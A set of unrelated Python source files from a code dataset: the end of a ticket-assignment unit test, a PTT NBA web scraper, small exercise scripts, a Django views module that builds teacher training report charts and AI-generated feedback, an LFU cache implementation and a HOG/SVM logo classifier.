duty_list=component_pb2.DutyList(on_duty=[\n duty_pb2.OnDuty(login='a'), duty_pb2.OnDuty(login='b'), duty_pb2.OnDuty(login='c')\n ])\n )\n parent_component = component_pb2.Component(\n owner_list=[owner_pb2.Owner(login='a'), owner_pb2.Owner(login='d'), owner_pb2.Owner(login='e')]\n )\n\n child_component.protocol_settings.assign_on_duty = True\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['b', 'c', 'a'])\n\n child_component.protocol_settings.add_owner_to_ticket_followers = True\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['b', 'c', 'a'])\n\n child_component.protocol_settings.add_owner_to_ticket_followers = False\n parent_component.protocol_settings.add_owner_to_ticket_followers = True\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['b', 'c', 'd', 'e', 'a'])\n\n child_component.protocol_settings.assign_on_duty = False\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['d', 'e', 'a', 'b', 'c'])\n\n manual_ticket = manual_ticket_pb2.ManualTicket()\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['d', 'e', 'a', 'b', 'c'], manual_ticket)\n\n def test_manual_ticket(self):\n child_component = component_pb2.Component(\n duty_list=component_pb2.DutyList(on_duty=[\n duty_pb2.OnDuty(login='a'), duty_pb2.OnDuty(login='b'), duty_pb2.OnDuty(login='c')\n ])\n )\n parent_component = component_pb2.Component(\n owner_list=[owner_pb2.Owner(login='a'), owner_pb2.Owner(login='d'), owner_pb2.Owner(login='e')]\n )\n manual_ticket = manual_ticket_pb2.ManualTicket(assignee='f')\n\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'f', ['a', 'd', 'e', 'b', 'c'], manual_ticket)\n\n manual_ticket = manual_ticket_pb2.ManualTicket(assignee='f', followers=['j', 'h', 'i'])\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'f', ['j', 'h', 'i'], manual_ticket)\n\n manual_ticket = manual_ticket_pb2.ManualTicket(followers=['j', 'h', 'i'])\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b', 'c'], 'a', ['j', 'h', 'i'], manual_ticket)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"Search engine/tests/test_assignee_followers_duty.py","file_name":"test_assignee_followers_duty.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31005229829","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nurl = \"https://www.ptt.cc/bbs/NBA/index6500.html\"\nheaders = {\"User-Agent\": \"Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.40\"}\nrequest = requests.get(url, headers=headers)\n# print(request.text)\nsoup = BeautifulSoup(request.text, \"html.parser\")\narticle = soup.find_all(\"div\", class_=\"r-ent\")\ndata_list = []\n\n# print(article[0])\nfor a in article:\n dict = {}\n title = a.find(\"div\", class_=\"title\")\n if title and title.a:\n title = title.a.text\n else:\n title = \"沒有標題\"\n # print(title)\n dict[\"標題\"] = title\n popular = a.find(\"div\", class_=\"nrec\")\n if popular and popular.span:\n popular = popular.span.text\n else:\n popular = \"N/A\"\n dict[\"人氣\"] = popular\n #print(f\"標題:{title},人氣:{popular}\")\n date = a.find(\"div\", class_=\"date\")\n if date:\n date = date.text\n else:\n date = \"沒有日期\"\n 
print(f\"標題:{title},人氣:{popular},日期:{date}\")\n dict[\"日期\"] = date\n data_list.append(dict)\nprint(data_list)\n\ndf = pd.DataFrame(data_list)\ndf.to_excel(\"ppt_nba_copy.xlsx\",index=False , engine=\"openpyxl\")\n\nprint(\"已經成功轉成ppt_nba_json\")\n\nif request.status_code == 200:\n with open(\"output.html\",'w',encoding=\"utf-8\") as f:\n f.write(request.text)\n print(\"寫入成功\")\nelse:\n print(\"沒有抓到資料\")\n\n\n","repo_name":"wp900622/pythonCrawler","sub_path":"Crawler.py","file_name":"Crawler.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15082406799","text":"def n(num):\r\n ret=0\r\n for i in range(10):\r\n ret+=int((num%(10**(i+1)))/(10**i))\r\n return ret\r\n\r\na=int(input())\r\nif a%n(a)==0:\r\n print('Yes')\r\nelse:\r\n print('No')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc080/B/4981194.py","file_name":"4981194.py","file_ext":"py","file_size_in_byte":169,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"4690646460","text":"guess = None\nvalue = 5\ntrial = 5\n\nprint(\"WELCOME TO OUR GUESS GAME\")\n\n\nwhile trial > 0:\n print('Your remaining trial is {}'.format(trial))\n guess = int(input('enter a number: '))\n if guess == value:\n print('You win')\n break\n \n else:\n trial = trial-1\nelse:\n print('You loss')\n ","repo_name":"aisha22020/Aisha","sub_path":"guess_game.py","file_name":"guess_game.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5813985081","text":"from likeprocessing.processing import *\n\ndef setup():\n createCanvas(200, 200)\n background('darkblue')\n stroke('white')\n noLoop()\n\ndef draw():\n for i in range(20, 200 , 20 ):\n line(i , 20, i , 180)\n\nrun(globals())","repo_name":"oultetman/pyprocess_exo","sub_path":"exo2.4.py","file_name":"exo2.4.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3981581110","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic.edit import UpdateView\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.contrib import messages\nfrom django.db.models import Avg\nfrom main.models import *\nimport datetime\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# dashboard libraries\nfrom math import pi\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Patch\nfrom matplotlib.lines import Line2D\nimport base64\nimport re\nfrom io import BytesIO\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer, TfidfTransformer\nfrom sklearn.feature_extraction import text\nimport pandas as pd\n\nfrom utils import chatgpt\nfrom .core import feedback_system_prompt\nfrom . 
import core\n\n\ndef index(request):\n    return render(request, \"report.html\")\n\ndef get_user_percentage_completion(curr_user, track_title):\n    # percentage of this track's videos that the given user has completed\n    curr_track = Track.objects.get(title=track_title)\n    serieses = Series.objects.filter(track=curr_track)\n    videos = Video.objects.filter(series__in=serieses)\n    total_videos = videos.count()\n    completed_videos = ModuleCompletion.objects.filter(user=curr_user, module__video__in=videos).count()\n    percentage = round(completed_videos / total_videos * 100)\n    return percentage\n\ndef produce_plot(track_title, curr_user):\n    percentage = get_user_percentage_completion(curr_user, track_title)\n\n    fig, ax = plt.subplots(figsize=(2, 2))\n    data = [percentage, 100-percentage]\n    wedgeprops = {'width':0.3, 'edgecolor':'black', 'lw':3}\n    patches, _ = ax.pie(data, wedgeprops=wedgeprops, startangle=90, colors=['#5DADE2', '#FFD600'])\n    patches[1].set_zorder(0)\n    patches[1].set_edgecolor('#FFD600')\n    plt.title(track_title.title(), fontsize=12, loc='center')\n    plt.text(0, 0, f\"{data[0]}%\", ha='center', va='center', fontsize=20)\n    # plt.text(0, 0, track_title, ha='center', va='top', fontsize=12)\n    \n    # save donut to image temporarily\n    tmpfile = BytesIO()\n    fig.savefig(tmpfile, format='png', transparent=True, bbox_inches='tight')\n    encoded = base64.b64encode(tmpfile.getvalue()).decode('utf-8')\n\n    html = '<img src=\"data:image/png;base64,{}\"/>'.format(encoded)\n    plt.close(fig)\n\n    return html\n\ndef get_user_topics(curr_user):\n\n    def pre_process(text):\n        # lowercase\n        text=text.lower()\n        # remove tags (the pattern had been stripped by HTML extraction)\n        text=re.sub(\"</?.*?>\",\" <> \",text)\n        # remove special characters and digits\n        text=re.sub(\"(\\\\d|\\\\W)+\",\" \",text)\n        return text\n\n    all_answers = [pre_process(x) for x in list(AnswerToVideoQuestion.objects.filter(user=curr_user).values_list('answer', flat=True)) if len(x.split()) > 1]\n    if (len(all_answers) == 0): return None, None\n    cv=CountVectorizer(max_df=0.85,stop_words=\"english\")\n    word_count_vector=cv.fit_transform(all_answers)\n    tfidf_transformer=TfidfTransformer(smooth_idf=True,use_idf=True)\n    tfidf_transformer.fit(word_count_vector)\n    # print(list(cv.vocabulary_.keys())[:10])\n\n    def sort_coo(coo_matrix):\n        tuples = zip(coo_matrix.col, coo_matrix.data)\n        return sorted(tuples, key=lambda x: (x[1], x[0]), reverse=True)\n\n    def extract_topn_from_vector(feature_names, sorted_items, topn=10):\n        \"\"\"get the feature names and tf-idf score of top n items\"\"\"\n        #use only topn items from vector\n        sorted_items = sorted_items[:topn]\n        score_vals = []\n        feature_vals = []\n        for idx, score in sorted_items:\n            fname = feature_names[idx]\n            #keep track of feature name and its corresponding score\n            score_vals.append(round(score, 3))\n            feature_vals.append(feature_names[idx])\n\n        #create a tuples of feature,score\n        #results = zip(feature_vals,score_vals)\n        results= {}\n        for idx in range(len(feature_vals)):\n            results[feature_vals[idx]]=score_vals[idx]\n        \n        return results\n    \n    # you only need to do this once\n    feature_names=cv.get_feature_names_out()\n    tf_idf_vector=tfidf_transformer.transform(cv.transform(all_answers))\n\n    results=[]\n    for i in range(tf_idf_vector.shape[0]):\n        # get vector for a single document\n        curr_vector=tf_idf_vector[i]\n        #sort the tf-idf vector by descending order of scores\n        sorted_items=sort_coo(curr_vector.tocoo())\n        #extract only the top n; n here is 10\n        keywords=extract_topn_from_vector(feature_names,sorted_items,10)\n        results.append(keywords)\n\n    df=pd.DataFrame(zip(all_answers,results),columns=['doc','keywords'])\n\n    # 
combine all keyword weight dicts in df into one dict\n all_keywords = {}\n for i in range(len(df)):\n for key in df['keywords'][i]:\n if key in all_keywords: all_keywords[key] += df['keywords'][i][key]\n else: all_keywords[key] = df['keywords'][i][key]\n \n # sort the dict by value and return top 10\n selected_keywords = dict(sorted(all_keywords.items(), key=lambda item: item[1], reverse=True)[:10])\n\n # convert df keywords column to joint string\n df['keywords'] = df['keywords'].apply(lambda x: \", \".join(list(x.keys())))\n\n return \", \".join(list(selected_keywords.keys())), df.values.tolist()\n\ndef user_report(request, user_id=0):\n if (user_id):\n curr_user = User.objects.get(pk=user_id)\n else:\n curr_user = request.user\n\n # if post request, update the feedback objects userfeedback\n if request.method == 'POST':\n # get the feedback object\n curr_feedback = Feedback.objects.filter(user=curr_user).latest('id')\n if (curr_feedback.user_feedback): curr_feedback.user_feedback += \"\\n\\n\" + request.POST.get('userfeedback')\n else: curr_feedback.user_feedback = request.POST.get('userfeedback')\n curr_feedback.save()\n messages.info(request, \"Thank you for the comment on the AI-generated feedback! We will use this to improve our system.\")\n\n curr_learner_model = LearnerModel.objects.get(user=curr_user)\n curr_feedback = Feedback.objects.filter(user=curr_learner_model.user).latest('id').feedback if Feedback.objects.filter(user=curr_learner_model.user).exists() else None\n keywords, topics_by_answer = get_user_topics(curr_user)\n context = {\n 'learner_model': curr_learner_model,\n 'metrics': {\n m: core.defined_metrics[m].to_view(int(getattr(curr_learner_model, m + \"_score\")))\n for m in core.defined_metrics\n },\n 'description': curr_feedback,\n 'feedback_obj': Feedback.objects.filter(user=curr_learner_model.user).latest('id'),\n \"all_users\": User.objects.filter(learnermodel__school=curr_user.learnermodel.school),\n \"teaching_plot\": produce_plot('teaching', curr_user),\n \"leadership_plot\": produce_plot('leadership', curr_user),\n \"multimedia_plot\": produce_plot('multimedia', curr_user),\n \"coaching_plot\": produce_plot('coaching', curr_user),\n \"digital_plot\": produce_plot('digital', curr_user),\n \"keywords\": keywords,\n \"topics_by_answer\": topics_by_answer,\n }\n return render(request, \"report.html\", context)\n\ndef expert_report(request, user_id):\n # TODO: figure out what best to show the expert user to make decisions\n # TODO: maybe we can use AI to generate the summary of feedback first, and have human look over\n # TODO: maybe we can use AI to select the best answers that show growth in specific competencies -> highlight that for experts\n\n # Get the user in question\n if (user_id == 0):\n curr_user = User.objects.first()\n else:\n curr_user = User.objects.get(pk=user_id)\n\n curr_learner_model = LearnerModel.objects.get(user=curr_user)\n completed_modules = ModuleCompletion.objects.filter(user=curr_user).all()\n keywords, topics_by_answer = get_user_topics(curr_user)\n context = {\n \"learner_model\": curr_learner_model,\n \"curr_user\": curr_user,\n \"all_users\": User.objects.filter(learnermodel__school=curr_user.learnermodel.school),\n \"completed_modules\": completed_modules,\n 'metrics': {\n m: core.defined_metrics[m].to_view(int(getattr(curr_learner_model, m + \"_score\")))\n for m in core.defined_metrics\n },\n 'feedback_obj': Feedback.objects.filter(user=curr_learner_model.user).latest('id'),\n \"teaching_plot\": produce_plot('teaching', 
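Stripped of the Django plumbing, get_user_topics boils down to the sketch below. It is a simplification on my part: TfidfVectorizer stands in for the CountVectorizer + TfidfTransformer pair used above, and the toy documents are invented.

from sklearn.feature_extraction.text import TfidfVectorizer

docs = ["students build lesson plans", "peer feedback improves lesson plans"]
vec = TfidfVectorizer(stop_words="english")
tfidf = vec.fit_transform(docs)

# Sum each term's tf-idf weight over all documents, then keep the heaviest terms.
weights = tfidf.sum(axis=0).A1
terms = vec.get_feature_names_out()
top = sorted(zip(terms, weights), key=lambda t: t[1], reverse=True)[:3]
print([term for term, _ in top])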
curr_user),\n        \"leadership_plot\": produce_plot('leadership', curr_user),\n        \"multimedia_plot\": produce_plot('multimedia', curr_user),\n        \"coaching_plot\": produce_plot('coaching', curr_user),\n        \"digital_plot\": produce_plot('digital', curr_user),\n        \"keywords\": keywords,\n        \"topics_by_answer\": topics_by_answer,\n    }\n    return render(request, \"report_expert.html\", context)\n\ndef school_report(request):\n\n    curr_user = request.user\n    data = User.objects.filter(learnermodel__school=curr_user.learnermodel.school)\n\n    def save_plot(fig):\n        # save plot to image temporarily\n        tmpfile = BytesIO()\n        fig.savefig(tmpfile, format='png', transparent=True, bbox_inches='tight')\n        encoded = base64.b64encode(tmpfile.getvalue()).decode('utf-8')\n\n        html = '<img src=\"data:image/png;base64,{}\"/>'.format(encoded)\n        plt.close(fig)\n\n        return html\n\n    def get_user_aggregate_plot(data):\n\n        # for each user, get percentage of completion and format into df\n        data_list = []\n        for user in data:\n            teaching = get_user_percentage_completion(user, 'teaching')\n            leadership = get_user_percentage_completion(user, 'leadership')\n            multimedia = get_user_percentage_completion(user, 'multimedia')\n            coaching = get_user_percentage_completion(user, 'coaching')\n            digital = get_user_percentage_completion(user, 'digital')\n            data_list.append({'user': user.username, 'teaching': teaching if teaching else 0, 'leadership': leadership if leadership else 0, 'multimedia': multimedia if multimedia else 0, 'coaching': coaching if coaching else 0, 'digital': digital if digital else 0 })\n        df = pd.DataFrame.from_records(data_list)\n        # plot = df.plot.barh(stacked=True, title=\"Percentage of Videos Completed by User\", ylabel=\"user\", y='user')\n        # fig = plot.get_figure()\n\n        # sort df by cumulative percentages\n        df['cumulative'] = df['teaching'] + df['leadership'] + df['multimedia'] + df['coaching'] + df['digital']\n        df = df.sort_values(by=['cumulative'], ascending=False)\n        df = df.drop(columns=['cumulative'])\n\n        columns = list(df.columns)\n        b = []\n        colors = plt.cm.get_cmap('plasma',len(columns))\n        xticks = [i for i in range(len(df))]\n\n        fig, ax = plt.subplots(figsize=(16, 9))\n        for i in range(1,len(columns)):\n            if i==1:\n                bar_bottom = 0\n            else:\n                bar_bottom = bar_bottom + df[columns[i-1]].values\n            b.append(plt.bar(xticks,\n                    df[columns[i]].values,\n                    bottom = bar_bottom,\n                    color = colors(i)))\n        for i in range(len(b)):\n            ax.bar_label(b[i],\n                       padding = 0,\n                       label_type = 'center',\n                       rotation = 'horizontal',) # color='grey'\n        ax.set_ylabel('Completion Percentages')\n        ax.set_xticks(xticks)\n        ax.set_xticklabels(df['user'].values, rotation = 90)\n        ax.set_title('Percentage of Videos Completed by User')\n        ax.legend(b, columns[1:])\n        ax.spines['top'].set_visible(False)\n        ax.spines['right'].set_visible(False)\n        ax.spines['bottom'].set_visible(False)\n        ax.spines['left'].set_visible(False)\n\n        # threshold = 0\n        # for c in ax.containers:\n        #     # Filter the labels\n        #     labels = [v if v > threshold else \"\" for v in c.datavalues] \n        #     ax.bar_label(c, labels=labels, label_type=\"center\",rotation = 'horizontal',color='grey')\n\n        # save plot to image temporarily\n        return save_plot(fig)\n    \n    def get_user_topics_agg(data):\n\n        # tally how often each keyword shows up across users' top topics\n        agg_topics = {}\n        for user in data:\n            topics,_ = get_user_topics(user)\n            if (topics):\n                for topic in topics.split(', '):\n                    if topic in agg_topics:\n                        agg_topics[topic] += 1\n                    else:\n                        agg_topics[topic] = 1\n        # sort agg_topics by value\n        agg_topics = dict(sorted(agg_topics.items(), key=lambda item: item[1], 
reverse=True))\n\n fig, ax = plt.subplots(figsize=(16, 9))\n # get list of agg_topics keys\n topics = list(agg_topics.keys())\n # get list of agg_topics values\n values = list(agg_topics.values())\n ax.bar(topics,values, color=\"#6a00a8\")\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.set_xticklabels(topics, rotation = 90)\n ax.set_title('Most Common Topics')\n \n # save plot to image temporarily\n return save_plot(fig)\n\n def get_modules_most_watched(data):\n # get all modules completed by users in data\n modules = ModuleCompletion.objects.filter(user__in=data)\n\n # for each module, add the count the video's track title in video_count\n video_count = {}\n for module in modules:\n if (not module.module.video.series): continue\n if module.module.video.series.track.title in video_count:\n video_count[module.module.video.series.track.title] += 1\n else:\n video_count[module.module.video.series.track.title] = 1\n \n # sort video_count by value\n video_count = dict(sorted(video_count.items(), key=lambda item: item[1], reverse=True))\n\n # plot the video_count dict into a pie chart\n fig, ax = plt.subplots(figsize=(16, 9))\n # convert 'plasma' colormap to list of colors\n colors = plt.cm.get_cmap('plasma',5)\n colors = [colors(i) for i in range(5)]\n ax.pie(video_count.values(), labels=video_count.keys(), autopct='%1.1f%%', startangle=90, colors=colors)\n ax.set_title('Percentages of Modules Completed by Track')\n\n return save_plot(fig)\n \n def get_agg_competency_scores(data):\n # get all learner models in data\n learner_models = LearnerModel.objects.filter(user__in=data)\n\n # get average scores of all learner models in dictionary\n avg_scores = {\n 'Planner Score': learner_models.aggregate(Avg('planner_score'))['planner_score__avg'],\n 'Guardian Score': learner_models.aggregate(Avg('guardian_score'))['guardian_score__avg'],\n 'Mentor Score': learner_models.aggregate(Avg('mentor_score'))['mentor_score__avg'],\n 'Motivator Score': learner_models.aggregate(Avg('motivator_score'))['motivator_score__avg'],\n 'Assessor Score': learner_models.aggregate(Avg('assessor_score'))['assessor_score__avg'],\n }\n\n # plot the avg_scores dict into a bar chart\n fig, ax = plt.subplots(figsize=(16, 9))\n ax.bar(avg_scores.keys(), avg_scores.values(), color=\"#6a00a8\")\n ax.set_title('Average Competency Scores')\n ax.set_ylabel('Score')\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n\n return save_plot(fig)\n \n context = {\n \"curr_user\": curr_user,\n \"agg_plot\":get_user_aggregate_plot(data),\n \"topics_plot\":get_user_topics_agg(data),\n \"watched_plot\":get_modules_most_watched(data),\n \"competency_plot\":get_agg_competency_scores(data),\n }\n return render(request, \"report_school.html\", context)\n\n\ndef approve_feedback(request, feedback_id):\n curr_fb = Feedback.objects.get(pk=feedback_id)\n\n if (curr_fb.human_approved):\n curr_fb.human_approved = False\n else:\n curr_fb.human_approved = True\n curr_fb.save()\n\n return expert_report(request, curr_fb.user.id)\n\n\ndef regenerate_feedback(request, feedback_id):\n # get usermodel\n curr_fb = Feedback.objects.get(pk=feedback_id)\n curr_user = curr_fb.user\n user_model = LearnerModel.objects.get(user=curr_user)\n\n # generate new description\n curr_fb.feedback = core.Description(user_model)\n\n return expert_report(request, 
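The figure-to-inline-HTML trick that produce_plot and save_plot rely on is easy to sanity-check in isolation. A standalone sketch follows; the <img> tag is exactly the piece the scraped copy of this file had dropped, reconstructed above.

import base64
from io import BytesIO

import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.plot([0, 1], [0, 1])

buf = BytesIO()
fig.savefig(buf, format="png", bbox_inches="tight")
encoded = base64.b64encode(buf.getvalue()).decode("utf-8")
html = '<img src="data:image/png;base64,{}"/>'.format(encoded)
plt.close(fig)
print(html[:60])  # a data URI that can be embedded directly in a template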
curr_fb.user.id)\n\n\ndef ai_edit_feedback(request, feedback_id):\n curr_fb = Feedback.objects.get(pk=feedback_id)\n\n # get edit_instructions from form\n instructions = request.POST.get('instructions')\n\n if instructions is not None:\n # ask ai to edit feedback\n edited = chatgpt(\n system_prompt=f\"\"\"You are an editing system for a feedback generator with the following instructions: {feedback_system_prompt}.\n\n You do not need to follow these instructions, but they are provided to help you understand the task. Perform any edits that the user gives you, regardless of tone or content. In an extraordinary circumstance, the only way you can reject an edit is by included the word \"REJECTED_EDIT\" in your response. FOLLOW THE USER'S INSTRUCTIONS EXACTLY!\n \"\"\",\n messages=[{\n \"role\": \"user\",\n \"content\": f\"\"\"\n This is the original message: {curr_fb.feedback}\n\n ===\n\n A world-class leading expert has carefully reviewed this message and has found some errors you must correct by doing the following: {instructions}\n \"\"\"\n }]\n )\n \n # check for rejection\n if \"REJECTED_EDIT\" in edited:\n print(\"REJECTED_EDIT\")\n print(edited)\n return expert_report(request, curr_fb.user.id)\n\n # update feedback\n curr_fb.feedback = edited\n\n # save feedback\n curr_fb.save()\n\n return expert_report(request, curr_fb.user.id)\n\n\nclass FeedbackUpdateView(SuccessMessageMixin, UpdateView):\n model = Feedback\n fields = ['feedback', \"planner_score\", \"guardian_score\", \"mentor_score\", \"motivator_score\", \"assessor_score\"]\n template_name = 'feedback_update.html'\n success_message = 'Feedback updated successfully!'\n\n def get_success_url(self):\n return reverse_lazy('report:expert_report', kwargs={'user_id': self.object.user.id})\n\n def form_valid(self, form):\n self.object.human_edited = True\n self.object.human_approved = True\n self.object.save()\n\n self.object.user.learnermodel.planner_score = self.object.planner_score\n self.object.user.learnermodel.guardian_score = self.object.guardian_score\n self.object.user.learnermodel.mentor_score = self.object.mentor_score\n self.object.user.learnermodel.motivator_score = self.object.motivator_score\n self.object.user.learnermodel.assessor_score = self.object.assessor_score\n self.object.user.learnermodel.save()\n return super().form_valid(form)\n","repo_name":"chriskok/cikguhub","sub_path":"report/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32028137301","text":"# https://leetcode.com/problems/lfu-cache/description/\n\"\"\" \nDesign and implement a data structure for a Least Frequently Used (LFU) cache.\n\nImplement the LFUCache class:\n\nLFUCache(int capacity) Initializes the object with the capacity of the data structure.\nint get(int key) Gets the value of the key if the key exists in the cache. Otherwise, returns -1.\nvoid put(int key, int value) Update the value of the key if present, or inserts the key if not already present. When the cache reaches its capacity, it should invalidate and remove the least frequently used key before inserting a new item. For this problem, when there is a tie (i.e., two or more keys with the same frequency), the least recently used key would be invalidated.\nTo determine the least frequently used key, a use counter is maintained for each key in the cache. 
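One standard way to hit the O(1) bound — and the shape of the implementation below — is a key-to-node hash map plus a frequency-to-doubly-linked-list map, with minFreq tracking the smallest non-empty bucket. An illustrative bucket state (my sketch, not part of the original problem statement):

freqList[1]: b <-> a     (both used once; 'a' is older, nearer the tail)
freqList[2]: c           (used twice)
minFreq = 1, so eviction pops the tail of freqList[1], i.e. key 'a'.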
The key with the smallest use counter is the least frequently used key.\n\nWhen a key is first inserted into the cache, its use counter is set to 1 (due to the put operation). The use counter for a key in the cache is incremented either a get or put operation is called on it.\n\nThe functions get and put must each run in O(1) average time complexity.\n\n \n\nExample 1:\n\nInput\n[\"LFUCache\", \"put\", \"put\", \"get\", \"put\", \"get\", \"get\", \"put\", \"get\", \"get\", \"get\"]\n[[2], [1, 1], [2, 2], [1], [3, 3], [2], [3], [4, 4], [1], [3], [4]]\nOutput\n[null, null, null, 1, null, -1, 3, null, -1, 3, 4]\n\nExplanation\n// cnt(x) = the use counter for key x\n// cache=[] will show the last used order for tiebreakers (leftmost element is most recent)\nLFUCache lfu = new LFUCache(2);\nlfu.put(1, 1); // cache=[1,_], cnt(1)=1\nlfu.put(2, 2); // cache=[2,1], cnt(2)=1, cnt(1)=1\nlfu.get(1); // return 1\n // cache=[1,2], cnt(2)=1, cnt(1)=2\nlfu.put(3, 3); // 2 is the LFU key because cnt(2)=1 is the smallest, invalidate 2.\n // cache=[3,1], cnt(3)=1, cnt(1)=2\nlfu.get(2); // return -1 (not found)\nlfu.get(3); // return 3\n // cache=[3,1], cnt(3)=2, cnt(1)=2\nlfu.put(4, 4); // Both 1 and 3 have the same cnt, but 1 is LRU, invalidate 1.\n // cache=[4,3], cnt(4)=1, cnt(3)=2\nlfu.get(1); // return -1 (not found)\nlfu.get(3); // return 3\n // cache=[3,4], cnt(4)=1, cnt(3)=3\nlfu.get(4); // return 4\n // cache=[4,3], cnt(4)=2, cnt(3)=3\n\"\"\"\nfrom collections import defaultdict\n\n\nclass Node:\n def __init__(self, key=0, val=0):\n self.prev = None\n self.next = None\n self.key = key\n self.val = val\n self.freq = 1\n\n\nclass DDL:\n def __init__(self):\n self.head = Node()\n self.tail = Node()\n\n self.head.next = self.tail\n self.tail.prev = self.head\n\n self.size = 0\n\n def __len__(self):\n return self.size\n\n def insert(self, node):\n node.next = self.head.next\n node.prev = self.head\n\n self.head.next.prev = node\n self.head.next = node\n self.size += 1\n\n def delete(self, node=None):\n if not node:\n # As it will be the first inserted node\n node = self.tail.prev\n\n if node == self.head:\n return\n\n # print('\\n',node.key,node.val)\n\n # Delete the node\n node.prev.next = node.next\n node.next.prev = node.prev\n\n node.next = None\n node.prev = None\n self.size -= 1\n return node.key\n\n def dis(self):\n temp = self.head.next\n while temp:\n print('v:', temp.val, 'k:', temp.key, 'f:', temp.freq, end=' ')\n temp = temp.next\n\n\nclass LFUCache:\n\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.hashMap = dict()\n self.freqList = defaultdict(DDL)\n self.minFreq = 0\n\n def get(self, key: int) -> int:\n # print('\\n get start')\n if key not in self.hashMap:\n return -1\n\n # After getting the key update its frequency\n node = self.hashMap[key]\n val = node.val\n freq = node.freq\n\n self.freqList[freq].delete(node)\n\n newNode = Node(key, val)\n newNode.freq = freq+1\n\n if self.minFreq == freq and len(self.freqList[freq]) == 0:\n self.minFreq += 1\n\n self.freqList[freq+1].insert(newNode)\n self.hashMap[key] = newNode\n\n # print('minFreq',self.minFreq)\n # print('\\n GET',key)\n # print('len:',freq,len(self.freqList[freq]))\n # self.freqList[freq].dis()\n # print('\\n len:',freq+1,len(self.freqList[freq+1]))\n # self.freqList[freq+1].dis()\n\n return val\n\n def put(self, key: int, value: int) -> None:\n # print('\\n put start')\n\n # If key already in hashMap update it\n # print('puminFreq',self.minFreq)\n if key in self.hashMap:\n # print('in')\n node = 
self.hashMap[key]\n freq = node.freq\n\n self.freqList[freq].delete(node)\n\n newNode = Node(key, value)\n newNode.freq = freq+1\n\n if self.minFreq == freq and len(self.freqList[freq]) == 0:\n self.minFreq += 1\n\n self.freqList[freq+1].insert(newNode)\n self.hashMap[key] = newNode\n\n else:\n if self.capacity == len(self.hashMap):\n # Remove the LFU\n dkey = self.freqList[self.minFreq].delete()\n\n del self.hashMap[dkey]\n\n newNode = Node(key, value)\n\n self.hashMap[key] = newNode\n\n self.freqList[1].insert(newNode)\n\n self.minFreq = 1\n\n # print('\\n PUT',key,value)\n # self.freqList[1].dis()\n\n\n# Your LFUCache object will be instantiated and called as such:\n# obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)\n","repo_name":"atharvaagrawal/dsa","sub_path":"Striver-A2Z/09_Stack_and_Queues/4_Implementation_Problem/2_LFU.py","file_name":"2_LFU.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69833396712","text":"from features import compute_hog_features\nfrom utils import load_data, transform_to_classification_dataset, report_metrics\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import LinearSVC\nimport cv2\n\n\nif __name__=='__main__':\n np.random.seed(42)\n recompute_vocabulary = False\n\n clf = LinearSVC(C=0.0005, class_weight=\"balanced\")\n\n train_images, test_images, train_logos, test_logos = load_data('./data', test_size=0.33)\n train_images_clf, y_train = transform_to_classification_dataset(train_images, train_logos)\n test_images_clf, y_test = transform_to_classification_dataset(test_images, test_logos)\n \n print(\"Training stage...\")\n X_train = compute_hog_features(train_images_clf)\n scaler = StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n clf.fit(X_train, y_train)\n y_pred = clf.predict(X_train)\n report_metrics(y_train, y_pred, \"Train\")\n\n print(\"Evaluation stage...\")\n X_test = compute_hog_features(test_images_clf)\n X_test = scaler.transform(X_test)\n y_pred = clf.predict(X_test)\n report_metrics(y_test, y_pred, \"Test\")\n\n s_test = np.ones(len(y_test), np.uint)\n nologo_idx = np.where(y_test == 10)\n s_test[nologo_idx] = 0\n \n s_pred = np.ones(len(y_pred), np.uint)\n nologo_idx = np.where(y_pred == 10)\n s_pred[nologo_idx] = 0\n report_metrics(s_test, s_pred, \"Logo/No-Logo results on testset\")\n\n \n 